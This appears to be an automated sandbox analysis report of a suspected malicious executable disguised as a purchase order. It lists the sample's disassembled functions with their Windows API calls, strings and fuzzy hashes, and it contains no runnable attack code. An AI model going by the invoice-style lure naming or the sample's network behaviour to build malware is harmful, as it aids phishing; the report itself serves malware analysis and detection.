                                                            Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 0-1603158881
                                                            • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                            • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                            • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                            • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                            Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateMenu.USER32 ref: 00448603
                                                            • SetMenu.USER32(?,00000000), ref: 00448613
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                            • IsMenu.USER32(?), ref: 004486AB
                                                            • CreatePopupMenu.USER32 ref: 004486B5
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                            • DrawMenuBar.USER32 ref: 004486F5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                            • String ID: 0
                                                            • API String ID: 161812096-4108050209
                                                            • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                            • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                            • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                            • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                            Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe), ref: 00434057
                                                            • LoadStringW.USER32(00000000), ref: 00434060
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                            • LoadStringW.USER32(00000000), ref: 00434078
                                                            • _wprintf.LIBCMT ref: 004340A1
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                            Strings
                                                            • C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, xrefs: 00434040
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
                                                            • API String ID: 3648134473-3548557895
                                                            • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                            • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                            • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                            • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                            Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2be63c4c740bed6b13276cd9094d24fb509619a89e5ede4690664bcfa53046fb
                                                            • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                            • Opcode Fuzzy Hash: 2be63c4c740bed6b13276cd9094d24fb509619a89e5ede4690664bcfa53046fb
                                                            • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                            Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                            • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                            • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                            • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                            Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,0040F545,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,004A90E8,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,?,0040F545), ref: 0041013C
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                            • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                            • String ID:
                                                            • API String ID: 978794511-0
                                                            • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                            • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                            • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                            • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                            Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                            • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                            • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                            • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                            Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                            • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                            • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                            • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                            Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memcmp
                                                            • String ID: '$\$h
                                                            • API String ID: 2205784470-1303700344
                                                            • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                            • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                            • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                            • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                            Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                            • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                            • VariantClear.OLEAUT32 ref: 0045EA6D
                                                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                            • __swprintf.LIBCMT ref: 0045EC33
                                                            • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                            Strings
                                                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                            • String ID: %4d%02d%02d%02d%02d%02d
                                                            • API String ID: 2441338619-1568723262
                                                            • Opcode ID: 75bf3760ea25d7c4a5a573425a2ad46220e67879b264479de051e46cf1f5c899
                                                            • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                            • Opcode Fuzzy Hash: 75bf3760ea25d7c4a5a573425a2ad46220e67879b264479de051e46cf1f5c899
                                                            • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                            Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                            • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                            • String ID: @COM_EVENTOBJ
                                                            • API String ID: 327565842-2228938565
                                                            • Opcode ID: 2d2e6611baaaed01bf0ac91f3b08fe096b6b0ff8b1e1267574a63fcd06cc1b28
                                                            • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                            • Opcode Fuzzy Hash: 2d2e6611baaaed01bf0ac91f3b08fe096b6b0ff8b1e1267574a63fcd06cc1b28
                                                            • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                            Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantClear.OLEAUT32(?), ref: 0047031B
                                                            • VariantClear.OLEAUT32(?), ref: 0047044F
                                                            • VariantInit.OLEAUT32(?), ref: 004704A3
                                                            • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                            • VariantClear.OLEAUT32(?), ref: 00470516
                                                              • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                            • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                              • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                            • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                            • String ID: H
                                                            • API String ID: 3613100350-2852464175
                                                            • Opcode ID: e37ddae6afbfab4e42c56a98e083e433457e6f10370462ae3740e8e57aad1eaa
                                                            • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                            • Opcode Fuzzy Hash: e37ddae6afbfab4e42c56a98e083e433457e6f10370462ae3740e8e57aad1eaa
                                                            • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                            Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                            • DestroyWindow.USER32(?), ref: 00426F50
                                                            • UnregisterHotKey.USER32(?), ref: 00426F77
                                                            • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 4174999648-3243417748
                                                            • Opcode ID: fe3eee30a864908006b9fc4ddc403302374997b53fdb802d0223bf5445d6af79
                                                            • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                            • Opcode Fuzzy Hash: fe3eee30a864908006b9fc4ddc403302374997b53fdb802d0223bf5445d6af79
                                                            • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                            Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                            • String ID:
                                                            • API String ID: 1291720006-3916222277
                                                            • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                            • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                            • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                            • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                            Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                            • IsMenu.USER32(?), ref: 0045FC5F
                                                            • CreatePopupMenu.USER32 ref: 0045FC97
